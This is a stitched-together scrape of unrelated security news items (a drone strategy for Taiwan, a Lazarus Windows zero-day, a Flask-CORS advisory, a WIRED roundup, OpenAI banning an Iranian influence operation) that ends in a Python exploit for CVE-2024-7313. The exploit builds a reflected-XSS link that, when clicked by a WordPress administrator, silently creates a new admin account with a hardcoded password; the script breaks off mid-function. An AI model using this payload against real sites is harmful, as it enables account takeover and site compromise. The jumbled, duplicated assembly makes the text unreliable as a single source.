An adversary could exploit these vulnerabilities by injecting malicious libraries into Microsoft's applications to gain their entitlements and user-granted permissions.

How multiple vulnerabilities in Microsoft apps for macOS pave the way to stealing permissions

The US Defense Department’s grand strategy for protecting Taiwan from a massive Chinese military offensive involves flooding the zone with thousands of drones.

It has become conventional wisdom among the halls of the United States government that China will launch a full-scale invasion of Taiwan within the next few years. And when that happens, the US military has a relatively straightforward response in mind: Unleash hell.

Speaking to The Washington Post on the sidelines of the International Institute for Strategic Studies’ annual Shangri-La Dialogue in June, US Indo-Pacific Command chief Navy Admiral Samuel Paparo colorfully described the US military’s contingency plan for a Chinese invasion of Taiwan as flooding the narrow Taiwan Strait between the two countries with swarms of thousands upon thousands of drones, by land, sea, and air, to delay a Chinese attack enough for the US and its allies to muster additional military assets in the region.

“I want to turn the Taiwan Strait into an unmanned hellscape using a number of classified capabilities,” Paparo said, “so that I can make their lives utterly miserable for a month, which buys me the time for the rest of everything.”

Cheap, easily weaponizable drones have transformed battlefields from Ukraine to the Middle East in recent years, and the US military is rapidly adapting to this new uncrewed future. While Paparo isn’t the first to invoke the image of a robotic “hellscape” with regards to Taiwan (his predecessor, Admiral John Aquilino had previously used the term in August 2023), his comments offer the most vivid description of the Defense Department’s plan for dealing with Chinese aggression toward the US ally. In recent months, new details have started to draw out the contours of what, exactly, this “hellscape” would look like.

**A Great Wall of Drones**

China has undertaken a major military buildup ahead of what American defense leaders see as an imminent attempt to annex Taiwan, which Beijing sees as a breakaway province. According to a June analysis from the Center for Strategic & International Studies, the People’s Liberation Army Navy now boasts the largest maritime force on the planet, with 234 warships to the US Navy’s fleet of 219; testifying before the Senate Armed Services Committee in March, then-INDOPACOM boss Aquilino stated that the PLA Air Force also now has the largest number of warplanes in the region (not counting uncrewed systems), with designs on soon surpassing the US and Russian air fleets.

While the exact size of the Chinese military’s arsenal of uncrewed vehicles is difficult to estimate, the country has become the leading exporter of armed combat drones around the world over the past decade (along with Turkey), according to data from the Stockholm International Peace Research Institute. And when it comes to the consumer drones that are converted into weapons of war by soldiers on the front lines, Chinese drone giant Da-Jiang Innovations (better known in the US as DJI) controls three-quarters of that market, according to The Wall Street Journal. While the US and China may appear locked in an military drone arms race, the latter currently possess a significant advantage.

“China has essentially copied all of the large and medium high-altitude drones the US has and produced what amount to cheaper versions of the MQ-9 Reaper or the \[RQ-4\] Global Hawk,” Stacie Pettyjohn tells WIRED. A senior fellow and director of defense programs at the Center for a New American Security, Pettyjohn is the lead author of the June report “Swarms Over the Strait” on the role of drones in a future conflict over Taiwan. “Potentially more concerning is the smaller drones that don’t have to fly as far and can be launched from mainland China, of which the Chinese military has many.”

Simply put, China has a lot of drones and can make a lot more drones quickly, creating a likely advantage during a protracted conflict. “This stands in contrast to American and Taiwanese forces, who do not have large inventories of drones or the right mix of drones to successfully defeat a Chinese invasion,” Pettyjohn and her coauthors write in the CNAS report.

Apart from beefing up Taiwan’s counter-drone defenses, the Pentagon’s “hellscape” plan proposes that the US military make up for this growing gap by producing and deploying what amounts to a massive screen of autonomous drone swarms designed to confound enemy aircraft, provide guidance and targeting to allied missiles, knock out surface warships and landing craft, and generally create enough chaos to blunt (if not fully halt) a Chinese push across the Taiwan Strait. Networked drones will not just strike adversaries but also provide critical intelligence, surveillance, and reconnaissance functions to fill the gaps between satellite imaging and crewed overflights, ostensibly allowing the US and its allies to develop a more complete picture of the battlefield as it evolves.

“A 2020 Rand Corporation report concludes that hundreds of networked, low-cost drones could guide American long-range anti-ship missiles toward a Chinese invasion fleet and would be a key capability needed to defeat China and successfully defend Taiwan,” the CNAS report says. “Similarly, proponents of air denial strategy argue that using ‘sufficiently large numbers of smaller, cheaper weapons,’ including ground-based air defenses and drone swarms, ‘in a distributed way’ would prevent China from gaining air superiority.”

As Pettyjohn points out to WIRED, the concept of Taiwan using densely layered defenses to inflict incredibly high losses on an invading Chinese force isn’t new, with past visions of a “porcupine strategy” built on missiles and mines as deterrents to an outright invasion. But the incorporation of massive drone fleets adds a new layer to the fight. Indeed, war games conducted by the US Air Force and defense think tanks like Rand over the past several years have pointed to the critical role drone swarms could play in potentially thwarting an invasion of Taiwan.

According to the CNAS report, this strategy appears to have been sharpened by recent lessons from Russia’s invasion of Ukraine, where the Ukrainian military has successfully deployed drones against the superiorly numbered and equipped Russian force to disrupt enemy formations, destroy armored vehicles, and even neutralize surface combatants. Look no further than the Black Sea, where Ukrainian forces have managed to destroy 26 Russian vessels and forced Moscow’s vaunted Black Sea Fleet to a safe harbor hundreds of miles away using missiles, kamikaze UAVs, and explosive-laden drone boats.

The CNAS report makes several recommendations for how the Pentagon can best employ drones to defend Taiwan, emphasizing the need to build a “diverse” fleet of UAVs encompassing “a mix of higher-end and cheaper systems” (the large and expensive Reaper versus low-cost single-use kamikaze drones, for example), investing in the development of autonomous drone boats for attacking larger surface warships, and pre-positioning short- and medium-range drones on Taiwan for a rapid, immediate response to a Chinese invasion.

“In addition to acquiring ‘good enough’ long-range drones for target acquisition and strike, the United States should have a smaller number of stealthy drones that can conduct surveillance in highly contested airspace and provide targeting information for standoff missile strikes,” the report says, adding that “affordable kamikaze drones with relatively simple autonomy could overwhelm the Chinese navy’s air defenses and damage or destroy the invasion fleet.”

**Engage the Replicator**

With a potential invasion looming, the Pentagon has kicked efforts to make its vision of a “hellscape” into high gear. Last August, deputy secretary of defense Kathleen Hicks announced the department’s new Replicator initiative, designed to build and field “attritable autonomous systems”—DOD-speak for disposable, AI-enabled drones—“at scale of multiple thousands, in multiple domains” within the next 18 to 24 months. As of March, the Pentagon had earmarked $1 billion across its fiscal-year 2024 and 2025 budgets for its first round of Replicator systems, as USNI News reported.

Replicator appears to be doing its job already. In May, the Pentagon announced its first tranche of fresh capabilities, which includes the accelerated fielding of more than 1,000 of defense contractor AeroVironment’s Switchblade-600 loitering munitions—a man-portable missile that circles over targets before dive-bombing them at the right moment—in the next year, as well as the procurement of uncrewed “interceptor” surface vessels under the department’s new Production-Ready, Inexpensive, Maritime Expeditionary (Prime) effort. According to a DOD solicitation released in January, the Prime drone boats will purportedly be capable of “autonomously transiting hundreds of miles through contested waterspace, loitering in an assigned operating area while monitoring for maritime surface threats, and then sprinting to interdict a noncooperative, maneuvering vessel.” The first Replicator systems were already deployed to the Indo-Pacific, according to Hicks, with some military units training with cheap drones produced under the initiative as of August.

"This is just the beginning," Admiral Christopher Grady, vice chairman of the Joint Chiefs of Staff, said in a May statement. "Replicator is helping us jump-start the delivery of critical capabilities at scale.

Replicator isn’t the US military’s only effort to incorporate uncrewed weapons platforms into its formations. The Army has asked for $120.6 million as part of its fiscal-year 2025 budget request for Low Altitude Stalking and Strike Ordnance (Lasso) semiautonomous loitering munitions to outfit infantry brigade combat teams with the capability. As of April, the Marine Corps has selected three defense contractors (AeroVironment, defense upstart Anduril, and Teledyne FLIR) to compete for a potential $249 million contract to furnish Marines with so-called Organic Precision Fires-Light kamikaze drone swarms (to say nothing of the Corps’ push to acquire Long Range Attack Missile air-launched loitering munition). US Special Operations Command, an early adopter of loitering munitions, now wants to outfit its fleet of aircraft with air-launched systems. And as for the maritime realm, the Marine Corps has been experimenting with uncrewed surface vessels bristling with Uvision Hero-120 kamikaze drone launchers, while the Navy has been eyeing missile-hauling drone boats as potential escorts for transport ships, among other lethal initiatives, after years of experimenting with uncrewed surface vessels as waterborne sensor nodes.

Beyond expanding its arsenal of uncrewed systems, the US is also working to bolster Taiwan’s own drone capabilities. In June, the State Department announced the approval of a $360 million weapons sale to Taipei that included 291 ALTIUS 600M-V kamikaze drones produced by Anduril and 720 Switchblade-300 loitering munitions. As the CNAS report notes, the integration of these one-way attack drones into Taiwanese military formations, when deployed in conjunction with explosive-laden drone boats and anti-ship missiles, could potentially prevent Chinese warships from ever reaching the country’s shores in a similar manner to how Ukrainian forces have denied the Russian military control over the Black Sea.

“Taiwan needs a lot of these systems and needs them quickly to incorporate them into broader tactics and formations” as effectively as the Ukrainians have, Pettyjohn says.

And this is just the beginning: The Taiwanese government plans to procure nearly 1,000 additional AI-enabled attack drones in the next year, according to Taipei Times, with long-standing plans to expand indigenous production of homegrown capabilities to prevent backlogs in weapons transfers from the United States—and, more importantly, ease reliance on Chinese-made commercial off-the-shelf parts. (Although, as Pettyjohn points out, the Taiwanese defense community itself isn’t totally unified around the “hellscape” plan in the first place.)

Access to commercial drones “is where Taiwan is most disadvantaged” because of DJI’s relative dominance of the market, Pettyjohn says, noting that “even if Taiwan had Chinese drones available to them, they would have to hack in to each system to ensure they can’t be tracked by DJI or don’t have similar vulnerabilities.”

“Consider that for most of the first-person-view kamikaze drones used in Ukraine right now, all of those components are sourced from China,” she adds. “Even Ukraine has tried to wean itself off Chinese sources and hasn’t found anything at a comparable price point.”

**Mass-Producing Hell**

Planning a “hellscape" of hundreds of thousands of drones is one thing, but actually making it a reality is another. An April 2023 assessment from the Rand Corporation indicated that rising demand for weaponized drones would likely “strain” the capacity of the existing US defense industrial base. Similarly, a separate CNAS report from June 2023 argued that the war in Ukraine (and the US government’s role as a major provider of security assistance to Kyiv) has “shed light on serious deficiencies” in the Pentagon’s ability to rapidly scale production of “key weapons” like precision-guided munitions compared to Russia—a problem echoed in the most recent CNAS report’s assessment of the US government’s approach to Taiwan’s defense.

“Ukraine consistently has pioneered new approaches to drone warfare, but Russia has rapidly adapted and scaled drone production in a way that Ukraine cannot match,” the June 2024 CNAS report says. “Technological and tactical innovations are necessary but not sufficient. Mass production of an affordable mix of drones is also needed to support a large and likely protracted conflict.”

The report adds that the US defense industrial based may not be “ currently capable of producing the quantities of drones needed for a war with China.”

Like Russia, China’s autocratic regime has enabled the country’s defense industrial base to rapidly accelerate weapons R&D and production, so far that Beijing is “heavily investing in munitions and acquiring high-end weapons systems and equipment five to six times faster than the United States,” as a March comparison from CSIS put it. By contrast, the US defense industrial ecosystem has over the past several decades consolidated into a handful of large “prime” contractors like Lockheed Martin and Raytheon, a development that threatens to not only stifle innovation but hamstring the production of critical systems needed for the next big war.

“Overall, the US defense industrial ecosystem lacks the capacity, responsiveness, flexibility, and surge capability to meet the US military’s production and war-fighting needs,” the CSIS report says. “Unless there are urgent changes, the United States risks weakening deterrence and undermining its war-fighting capabilities.”

To that end, the latest CNAS report recommends that the Pentagon and Congress work to foster both the commercial and military drone industrial base “to scale production and create surge capacity” to quickly replace drones lost in a future conflict. While the Pentagon has, with regards to Ukraine, relied on multi-year and large-lot procurement programs to source munitions from large “primes” and “\[provide\] industry with the stability it needs to expand production capacity,” as the 2023 CNAS report put it, the Replicator initiative is explicitly designed to not only further provide that stability to drone makers but also to pull in “nontraditional” defense industry players—startups like Anduril or drone boat maker Saronic, the latter of which recently received $175 million in Series B funding to scale up its manufacturing capacity.

Replicator “provides the commercial sector with a demand signal that allows companies to make investments in building capacity, strengthening both the supply chain and the industrial base,” according to the Defense Innovation Unit, the Pentagon organ responsible for capitalizing on emerging commercial technologies. “Replicator investments incentivize traditional and non-traditional industry players to deliver record volumes of all domain attritable autonomous systems in line with the ambitious schedule set forth by the deputy secretary of defense.”

“It comes down to contracts,” Pettyjohn says. “Where Replicator is potentially most impactful is where the Pentagon buys something they keep for a few years before they get something new for a different mission set so the DOD isn’t keeping a system in their inventory for decades. Establishing those practices, getting those contracts out there, and getting enough money into it so there’s competition and resiliency within industry is really needed to fuel innovation and provide the capabilities that are needed.”

It’s unclear whether the United States will actually be ready to defend Taiwan when the moment arrives; as legendary Prussian military commander Helmuth von Moltke is famously quoted as saying, “no plan survives first contact with the enemy.” But with the right preparation, funding, and training (and a little luck), the Pentagon and its Taiwanese partners may end up successfully throwing a wrench in China’s suspected invasion plans by flooding the zone with lethal drones. War is hell, but when the next big conflict in the Indo-Pacific rolls around, the US wants to guarantee that it will be an absolute hellscape—for the Chinese military, at least.

The Pentagon Is Planning a Drone ‘Hellscape’ to Defend Taiwan

A newly patched security flaw in Microsoft Windows was exploited as a zero-day by Lazarus Group, a prolific state-sponsored actor affiliated with North Korea.
The security vulnerability, tracked as CVE-2024-38193 (CVSS score: 7.8), has been described as a privilege escalation bug in the Windows Ancillary Function Driver (AFD.sys) for WinSock.
"An attacker who successfully exploited this

A newly patched security flaw in Microsoft Windows was exploited as a zero-day by Lazarus Group, a prolific state-sponsored actor affiliated with North Korea.

The security vulnerability, tracked as **CVE-2024-38193** (CVSS score: 7.8), has been described as a privilege escalation bug in the Windows Ancillary Function Driver (AFD.sys) for WinSock.

"An attacker who successfully exploited this vulnerability could gain SYSTEM privileges," Microsoft said in an advisory for the flaw last week. It was addressed by the tech giant as part of its monthly Patch Tuesday update.

Credited with discovering and reporting the flaw are Gen Digital researchers Luigino Camastra and Milánek. Gen Digital owns a number of security and utility software brands like Norton, Avast, Avira, AVG, ReputationDefender, and CCleaner.

"This flaw allowed them to gain unauthorized access to sensitive system areas," the company disclosed last week, adding it discovered the exploitation in early June 2024. "The vulnerability allowed attackers to bypass normal security restrictions and access sensitive system areas that most users and administrators can't reach."

The cybersecurity vendor further noted that the attacks were characterized by the use of a rootkit called FudModule in an attempt to evade detection.

While the exact technical details associated with the intrusions are presently unknown, the vulnerability is reminiscent of another privilege escalation that Microsoft fixed in February 2024 and was also weaponized by the Lazarus Group to drop FudModule.

Specifically, it entailed the exploitation of CVE-2024-21338 (CVSS score: 7.8), a Windows kernel privilege escalation flaw rooted in the AppLocker driver (appid.sys) that makes it possible to execute arbitrary code such that it sidesteps all security checks and runs the FudModule rootkit.

Both these attacks are notable because they go beyond a traditional Bring Your Own Vulnerable Driver (BYOVD) attack by taking advantage of a security flaw in a driver that's already installed on a Windows host as opposed to "bringing" a susceptible driver and using it to bypass security measures.

Previous attacks detailed by cybersecurity firm Avast revealed that the rootkit is delivered by means of a remote access trojan known as Kaolin RAT.

"FudModule is only loosely integrated into the rest of Lazarus' malware ecosystem," the Czech company said at the time, stating "Lazarus is very careful about using the rootkit, only deploying it on demand under the right circumstances."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Patches Zero-Day Flaw Exploited by North Korea’s Lazarus Group

A vulnerability in corydolphin/flask-cors version 4.0.1 allows the `Access-Control-Allow-Private-Network` CORS header to be set to true by default, without any configuration option. This behavior can expose private network resources to unauthorized external access, leading to significant security risks such as data breaches, unauthorized access to sensitive information, and potential network intrusions.

**Flask-CORS allows the \`Access-Control-Allow-Private-Network\` CORS header to be set to true by default**

Moderate severity GitHub Reviewed Published Aug 18, 2024 to the GitHub Advisory Database • Updated Aug 19, 2024

GHSA-hxwh-jpp2-84pm: Flask-CORS allows the `Access-Control-Allow-Private-Network` CORS header to be set to true by default

Plus: US regulators fine T-Mobile $60 million for mishap with sensitive data, New Zealand approves Kim Dotcom’s US extradition, and San Francisco takes on deepfake porn.

The 2024 US presidential election is entering its final stretch, which means state-backed hackers are slipping out of the shadows to meddle in their own special way. That includes Iran’s APT42, a hacker group affiliated with Iran’s Islamic Revolutionary Guard Corps, which Google’s Threat Analysis Group says targeted nearly a dozen people associated with Donald Trump’s and Joe Biden’s (now Kamala Harris’) campaigns.

The rolling disaster that is the breach of data broker and background-check company National Public Data is just beginning. While the breach of the company happened months ago, the company only acknowledged it publicly on Monday after someone posted what they claimed was “2.9 billion records” of people in the US, UK, and Canada, including names, physical addresses, and Social Security numbers. Ongoing analysis of the data, however, shows the story is far messier—as are the risks.

You can now add bicycle shifters and gym lockers to the list of things that can be hacked. Security researchers revealed this week that Shimano’s Di2 wireless shifters can be vulnerable to various radio-based attacks, which could allow someone to change a rider’s gears remotely or prevent them from changing gears at a crucial moment in a race. Meanwhile, other researchers found that it’s possible to extract the administrator keys to electronic lockers used in gyms and offices around the world, potentially giving a criminal access to every locker at a single location.

If you use a Google Pixel phone, don’t let it out of your sight: An unpatched vulnerability in a hidden Android app called Showcase.apk could give an attacker the ability to gain deep access to your device. Exploiting the vulnerability may require physical access to a targeted device, but researchers at iVerify who discovered the flaw say it may also be possible through other vulnerabilities. Google says it plans to release a fix “in the coming weeks,” but that’s not good enough for data analytics firm and US military contractor Palantir, which will stop using all Android devices due to what it believes was an insufficient response from Google.

But that’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

**Geofence Warrants Ruled Unconstitutional—but That’s Not the End of It**

A US federal appeals court ruled last week that so-called geofence warrants violate the Fourth Amendment’s protections against unreasonable searches and seizures. Geofence warrants allow police to demand that companies such as Google turn over a list of every device that appeared at a certain location at a certain time. The US Fifth Circuit Court of Appeals ruled on August 9 that geofence warrants are “categorically prohibited by the Fourth Amendment” because “they _never_ include a specific user to be identified, only a temporal and geographic location where any given user _may_ turn up post-search.” In other words, they’re the unconstitutional fishing expedition that privacy and civil liberties advocates have long asserted they are.

Google, which collects the location histories of tens of millions of US residents and is the most frequent target of geofence warrants, vowed late last year that it was changing how it stores location data in such a way that geofence warrants may no longer return the data they once did. Legally, however, the issue is far from settled: The Fifth Circuit decision applies only to law enforcement activity in Louisiana, Mississippi, and Texas. Plus, because of weak US privacy laws, police can simply purchase the data and skip the pesky warrant process altogether. As for the appellants in the case heard by the Fifth Circuit, well, they’re no better off: The court found that the police used the geofence warrant in “good faith” when it was issued in 2018, so they can still use the evidence they obtained.

**T-Mobile Hit With $60 Million Fine for “Sensitive Data” Mishap**

The Committee on Foreign Investment in the US (CFIUS) fined German-owned T-Mobile a record $60 million this week for its mishandling of data during its integration with US-based Sprint following the companies’ merger in 2020. According to CFIUS, “T-Mobile failed to take appropriate measures to prevent unauthorized access to certain sensitive data,” in violation of a National Security Agreement the company signed with the committee, which assesses the national security implications of foreign business deals with US companies. T-Mobile said in a statement that technical issues impacted “information shared from a small number of law enforcement information requests.” While the company claims to have acted “quickly” and “in a timely manner,” CFIUS claims T-Mobile “failed to report some incidents of unauthorized access promptly to CFIUS, delaying the Committee’s efforts to investigate and mitigate any potential harm.”

**New Zealand Approves US Extradition of Kim Dotcom**

The 12-year saga that is the prosecution of Kim Dotcom inched forward this week with the New Zealand justice minister approving the US’s request to extradite the controversial entrepreneur. Dotcom created the file-sharing service Megaupload, which US authorities say was used for widespread copyright infringement. The US seized Megaupload in 2012 and indicted Dotcom on charges related to racketeering, copyright infringement, and money laundering. Dotcom has denied any wrongdoing but lost an attempt to block the extradition in 2017 and has been fighting it ever since. Despite the justice minister’s decision, Dotcom vowed in a post on X to remain in the country where he’s been a legal resident since 2010. “I love New Zealand,” he wrote. “I’m not leaving.”

**San Francisco Takes On the Deepfake Porn Problem**

The growing scourge of deepfake pornography—explicit images that digitally “undress” people without their consent—may have finally hit a major legal roadblock. San Francisco’s chief deputy city attorney, Yvonne Meré—and the City of San Francisco by extension—has filed a lawsuit against the 16 most popular “nudification” websites. These sites and apps allow people to make explicit deepfake images of virtually anyone, but they have increasingly been used by boys to make sexual abuse material of their underage female classmates. While several states have criminalized the creation and distribution of AI-generated sexual abuse material of minors, Meré’s lawsuit effectively seeks to shut down the sites entirely.

Geofence Warrants Ruled Unconstitutional—but That’s Not the End of It

OpenAI on Friday said it banned a set of accounts linked to what it said was an Iranian covert influence operation that leveraged ChatGPT to generate content that, among other things, focused on the upcoming U.S. presidential election.
"This week we identified and took down a cluster of ChatGPT accounts that were generating content for a covert Iranian influence operation identified as

OpenAI on Friday said it banned a set of accounts linked to what it said was an Iranian covert influence operation that leveraged ChatGPT to generate content that, among other things, focused on the upcoming U.S. presidential election.

"This week we identified and took down a cluster of ChatGPT accounts that were generating content for a covert Iranian influence operation identified as Storm-2035," OpenAI said.

"The operation used ChatGPT to generate content focused on a number of topics — including commentary on candidates on both sides in the U.S. presidential election – which it then shared via social media accounts and websites."

The artificial intelligence (AI) company said the content did not achieve any meaningful engagement, with a majority of the social media posts receiving negligible to no likes, shares, and comments. It further noted it had found little evidence that the long-form articles created using ChatGPT were shared on social media platforms.

The articles catered to U.S. politics and global events, and were published on five different websites that posed as progressive and conservative news outlets, indicating an attempt to target people on opposite sides of the political spectrum.

OpenAI said its ChatGPT tool was used to create comments in English and Spanish, which were then posted on a dozen accounts on X and one on Instagram. Some of these comments were generated by asking its AI models to rewrite comments posted by other social media users.

"The operation generated content about several topics: mainly, the conflict in Gaza, Israel's presence at the Olympic Games, and the U.S. presidential election—and to a lesser extent politics in Venezuela, the rights of Latinx communities in the U.S. (both in Spanish and English), and Scottish independence," OpenAI said.

"They interspersed their political content with comments about fashion and beauty, possibly to appear more authentic or in an attempt to build a following."

Storm-2035 was also one of the threat activity clusters highlighted last week by Microsoft, which described it as an Iranian network "actively engaging U.S. voter groups on opposing ends of the political spectrum with polarizing messaging on issues such as the US presidential candidates, LGBTQ rights, and the Israel-Hamas conflict."

Some of the phony news and commentary sites set up by the group include EvenPolitics, Nio Thinker, Savannah Time, Teorator, and Westland Sun. These sites have also been observed utilizing AI-enabled services to plagiarize a fraction of their content from U.S. publications. The group is said to be operational from 2020.

Microsoft has further warned of an uptick in foreign malign influence activity targeting the U.S. election over the past six months from both Iranian and Russian networks, the latter of which have been traced back to clusters tracked as Ruza Flood (aka Doppelganger), Storm-1516, and Storm-1841 (aka Rybar).

"Doppelganger spreads and amplifies fabricated, fake or even legitimate information across social networks," French cybersecurity company HarfangLab said. "To do so, social networks accounts post links that initiate an obfuscated chain of redirections leading to final content websites."

However, indications are that the propaganda network is shifting its tactics in response to aggressive enforcement, increasingly using non-political posts and ads and spoofing non-political and entertainment news outlets like Cosmopolitan, The New Yorker and Entertainment Weekly in an attempt to evade detection, per Meta.

The posts contain links that, when tapped, redirects users to a Russia war- or geopolitics-related article on one of the counterfeit domains mimicking entertainment or health publications. The ads are created using compromised accounts.

The social media company, which has disrupted 39 influence operations from Russia, 30 from Iran, and 11 from China since 2017 across its platforms, said it uncovered six new networks from Russia (4), Vietnam (1), and the U.S. (1) in the second quarter of 2024.

"Since May, Doppelganger resumed its attempts at sharing links to its domains, but at a much lower rate," Meta said. "We've also seen them experiment with multiple redirect hops including TinyURL's link-shortening service to hide the final destination behind the links and deceive both Meta and our users in an attempt to avoid detection and lead people to their off-platform websites."

The development comes as Google's Threat Analysis Group (TAG) also said this week that it had detected and disrupted Iranian-backed spear-phishing efforts aimed at compromising the personal accounts of high-profile users in Israel and the U.S., including those associated with the U.S. presidential campaigns.

The activity has been attributed to a threat actor codenamed APT42, a state-sponsored hacking crew affiliated with Iran's Islamic Revolutionary Guard Corps (IRGC). It's known to share overlaps with another intrusion set known as Charming Kitten (aka Mint Sandstorm).

"APT42 uses a variety of different tactics as part of their email phishing campaigns — including hosting malware, phishing pages, and malicious redirects," the tech giant said. "They generally try to abuse services like Google (i.e. Sites, Drive, Gmail, and others), Dropbox, OneDrive and others for these purposes."

The broad strategy is to gain the trust of their targets using sophisticated social engineering techniques with the goal of getting them off their email and into instant messaging channels like Signal, Telegram, or WhatsApp, before pushing bogus links that are designed to collect their login information.

The phishing attacks are characterized by the use of tools like GCollection (aka LCollection or YCollection) and DWP to gather credentials from Google, Hotmail, and Yahoo users, Google noted, highlighting APT42's "strong understanding of the email providers they target."

"Once APT42 gains access to an account, they often add additional mechanisms of access including changing recovery email addresses and making use of features that allow applications that do not support multi-factor authentication like application-specific passwords in Gmail and third-party app passwords in Yahoo," it added.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

OpenAI Blocks Iranian Influence Operation Using ChatGPT for U.S. Election Propaganda

WordPress Shield Security plugin versions 20.0.5 and below cross site scripting exploit that adds an administrative user.

# Exploit Title: CVE-2024-7313 - Reflected XSS to Unauthorised Administrator Account Creation  
# Google Dork: inurl:"/wp-content/plugins/wp-simple-firewall/" (Cannot find version numbers from this DORK)  
# Date: 16/08/2024  
# Exploit Author: Tim Lepp  
# Vendor Homepage: https://getshieldsecurity.com/  
# Software Link: https://wordpress.org/plugins/wp-simple-firewall/advanced/ (Version <= 20.0.5)  
# Version: <20.0.6  
# Tested on: Ubuntu  
# CVE : CVE-2024-7313

How It Works

  *   The script first checks if the target WordPress installation is using a vulnerable version of the Shield Security plugin by examining the response from the wp-login.php page.  
  *   If the plugin version is vulnerable, it proceeds to generate a reflected XSS payload that, when executed, will create a new admin user with a hardcoded password as WordPress wont accept weak passwords without user intervention.  
  *   The payload is created to first use a GET request to dynamically find the WordPress nonce used for account creation, then use that nonce to submit a POST request to the user creation endpoint with the details of the new user given in the script.  
  *  
The payload is then URL-encoded and displayed for use in the attack.  
  *  
Once sent to an administrator of the site and the link is clicked, a new Administrator user will be created on the site with the details parsed by the script. This is all done in the background, with the phished administrator being redirected to the Shield Security dashboard with no clue of the exploit in the background.

Reference  
https://research.cleantalk.org/cve-2024-7313/

Found also at https://github.com/Wayne-Ker/CVE-2024-7313/tree/main

--- code ---

import sys  
import urllib.parse  
import requests  
from bs4 import BeautifulSoup

# Color codes for terminal output  
red = '\033[91m'  
green = '\033[92m'  
yellow = '\033[93m'  
blue = '\033[96m'  
purple = '\033[95m'  
reset = '\033[0m'

# Banner and vulnerability information - Displayed at the start of the script  
def print_banner():  
    print(f"""{red}  
#############################################################################  
#                                                                           #  
#                                                                           #  
#   ______     _______     ____   ___ ____  _  _       _____ _____ _ _____  #  
#  / ___\ \   / | ____|   |___ \ / _ |___ \| || |     |___  |___ // |___ /  #  
# | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ / /  |_ \| | |_ \  #  
# | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ /  ___) | |___) | #  
#  \____|  \_/  |_____|   |_____|\___|_____|  |_|      /_/  |____/|_|____/  #  
#                                                                           #  
#    Shield Security Plugin Vulnerability (CVE-2024-7313)                   #  
#    Reflected XSS in WordPress Shield Security Plugin                      #  
#    Versions Affected: < 20.0.6                                            #  
#    Risk: High                                                             #  
#    Discovered by: Wayne-Kerr                                              #  
#    Published: August 7, 2024                                              #  
#############################################################################   
    {reset}""")

# Help menu - Provides instructions when '-h' or '--help' is used  
def print_help():  
    print(f"""{yellow}  
Usage: python3 exploit.py <target_url>

Example:  
    python3 exploit.py http://example.com

Options:  
    -h, --help    Show this help message and exit  
{reset}""")

# Format the target URL - Ensures the URL starts with "http://" or "https://"  
def format_target_url(target_url):  
    if target_url.startswith("http://") or target_url.startswith("https://"):  
        return target_url  
    else:  
        return f"http://{target_url}"

# Check if the target is vulnerable by accessing the wp-login.php page  
def check_vulnerability(target_url):  
    try:  
        response = requests.get(f"{target_url}/wp-login.php")  
        if response.status_code == 200:  
            # Try to extract version information from the response  
            version_info = response.text.split("ver=")[-1].split("\"")[0]  
            version = version_info.split(".")  
            major_version = int(version[0])  
            minor_version = int(version[1])  
            patch_version = int(version[2].split('&')[0])

            # Check if the version is below 20.0.6  
            if major_version < 20 or (major_version == 20 and minor_version == 0 and patch_version < 6):  
                print(f"{green}Shield Security version is vulnerable. Let's continue.{reset}")  
                return True  
            else:  
                print(f"{yellow}Version not vulnerable.{reset}")  
                return False  
        else:  
            print(f"{red}Failed to retrieve the version information.{reset}")  
            return False  
    except Exception as e:  
        print(f"{red}Error occurred while checking vulnerability: {e}{reset}")  
        return False

# Generate the XSS payload URL that exploits the vulnerability  
def generate_xss_payload(target_url, username, email, first_name, last_name):  
    # Hardcoded password for the new admin account to be created  
    hardcoded_password = "HaxorStrongAFPassword123!!"

    # The payload template for the XSS attack  
    payload_template = (  
        "var xhrNonce = new XMLHttpRequest(); "  
        "xhrNonce.open('GET', '/wp-admin/user-new.php', true); "  
        "xhrNonce.onload = function() {{ "  
        "if (xhrNonce.status === 200) {{ "  
        "var nonce = xhrNonce.responseText.match(/name=\"_wpnonce_create-user\" value=\"([a-zA-Z0-9]+)\"/)[1]; "  
        "var xhr = new XMLHttpRequest(); "  
        "xhr.open('POST', '/wp-admin/user-new.php', true); "  
        "xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); "  
        "xhr.setRequestHeader('Referer', '{target}/wp-admin/user-new.php'); "  
        "xhr.setRequestHeader('Origin', '{target}'); "  
        "var params = 'action=createuser&_wpnonce_create-user=' + nonce + "  
        "'&_wp_http_referer=%2Fwp-admin%2Fuser-new.php"  
        "&user_login={username}&email={email}"  
        "&first_name={first_name}&last_name={last_name}&url=test"  
        "&pass1={password}&pass2={password}&role=administrator"  
        "&createuser=Add+New+User'; "  
        "xhr.send(params); "  
        "xhr.onload = function() {{ "  
        "if (xhr.status == 200) {{ "  
        "console.log('Admin user created successfully'); "  
        "window.location.href = '{target}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=overview'; "  
        "}} else {{ console.log('Error occurred: ' + xhr.statusText); }} "  
        "}}; "  
        "}} else {{ console.log('Error fetching nonce: ' + xhrNonce.statusText); }} }}; "  
        "xhrNonce.send();"  
    )

    # Formatting the payload with the provided details  
    payload = payload_template.format(  
        target=target_url,  
        username=username,  
        email=urllib.parse.quote(email),  
        first_name=first_name,  
        last_name=last_name,  
        password=urllib.parse.quote(hardcoded_password)  
    )

    # URL encode the payload and generate the full URL for the XSS attack  
    encoded_payload = urllib.parse.quote(f"<script>{payload}</script>")  
    full_url = f"{target_url}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub={encoded_payload}"

    return full_url

if __name__ == "__main__":  
    try:  
        # Print the banner  
        print_banner()

        # Check for help menu flag and print help if necessary  
        if len(sys.argv) != 2 or sys.argv[1] in ['-h', '--help']:  
            print_help()  
            sys.exit(0)

        # Get the target URL from the command-line argument  
        raw_target_url = sys.argv[1]  
        target_url = format_target_url(raw_target_url)

        # Check if the target is vulnerable  
        if not check_vulnerability(target_url):  
            sys.exit(1)

        # Get user input for the new admin account details  
        username = input(f"{blue}Enter username: {reset}")  
        email = input(f"{blue}Enter email: {reset}")  
        first_name = input(f"{blue}Enter first name: {reset}")  
        last_name = input(f"{blue}Enter last name: {reset}")

